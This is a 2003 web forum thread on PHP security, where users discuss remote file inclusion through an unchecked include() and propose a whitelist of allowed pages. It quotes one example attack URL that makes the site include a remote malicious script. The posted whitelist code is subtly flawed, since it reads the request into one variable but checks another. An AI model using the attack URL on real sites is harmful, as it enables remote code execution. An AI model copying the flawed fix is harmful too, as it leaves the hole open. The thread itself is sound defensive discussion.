1. Home
  2. Forums Index
  3. Server Side / PHP Server Side Scripting 1:59 am Apr 28, 2026

Forum Moderators: coopster

Message Too Old, No Replies

PHP Security

Further to 'Some common mistakes'

         

mipapage

12:12 pm on May 15, 2003 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Building on this thread, which is now closed:
[webmasterworld.com ]

For example, I saw one website where the urls were all index.php?a=filename and index.php was a template with:
include($a);
in the middle. If someone were to form a url such as index.php?a=http://www.theirdomain.com/maliciousscript.php,
problems would have ensued.

This was posted in the thread quoted above.

With a few new sites that I am designing, I will be doing the very thing outlined above, based on advice that I received here at WW [webmasterworld.com].

Now, I am 'cloaking' my urls using mod_rewrite, making them all .html files. So, this in effect would hide the fact that my site even uses anything dynamic, let alone PHP. But still, I'm sure there may be ways to figure this out, is there anything else that I can do to be sure that I am safe?

One idea that I had was to use random/wacko names for my variables. This would not be too confusing for these sites, as I am not using too many variables. Does this make sense/work?

cidrolin

2:38 pm on May 15, 2003 (gmt 0)

10+ Year Member



I don't think passing unchecked variables to an include() or require() to be good programming practise, as far as security is concerned. Rewriting urls is so frequent nowadays that it's somewhat naive to assume no-one will suspect dynamic pages generation lies behind such urls.

Personnally I use a database to store the content, which means I only use hard-coded include() statements for function libraries and to initialize variables/constants.

If you feel using files is necessary for your projects, I would suggest that you keep a textfile with all the filenames your script is allowed to call, then check if the GET-method passed value is somewhere in this file before include()-ing it

As this textfile is not intented for publication you can adequately protect if from the http server with a .htaccess file for exemple (assuming you're using Apache).

mipapage

2:56 pm on May 15, 2003 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Thank cidrolin,

we are using apache, and I believe I saw an example of what you mention somewhere... I'm off to check it out...

senior mcinvale

3:38 pm on May 15, 2003 (gmt 0)

10+ Year Member



check the values being passed into your include.

mipapage

9:51 pm on May 15, 2003 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



cidrolin and senior_mcinvale:

How's this for a solution? (picked from alistapart) 

$acceptable_pages = array( 
'test', 
'another', 
'photos', 
'projects' 
); 
// get the page from the URL 
$twomaroon = $_REQUEST[ 'page' ]; 
// make sure the page is in the acceptable pages array 
if ( in_array( $page, $acceptable_pages ) ) 
{ 
include("{$page}.php"); 
} 
else 
{ 
// 404 page 
include( "error.php" ); 
}

I would include this in my template.php file, for example. I imagine that seeing this very basic code is making you both mash your teeth, but this seems to be a simple and effective solution.

It seems kinda thin and unelegante to me as well - however, I am class="rookie" with PHP, and it does get the job done.

I'm sure this is one of those things you look back on and think 'what a rookie'
 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

  1. Home
  2. Forums Index
  3. Server Side / PHP Server Side Scripting 1:59 am Apr 28, 2026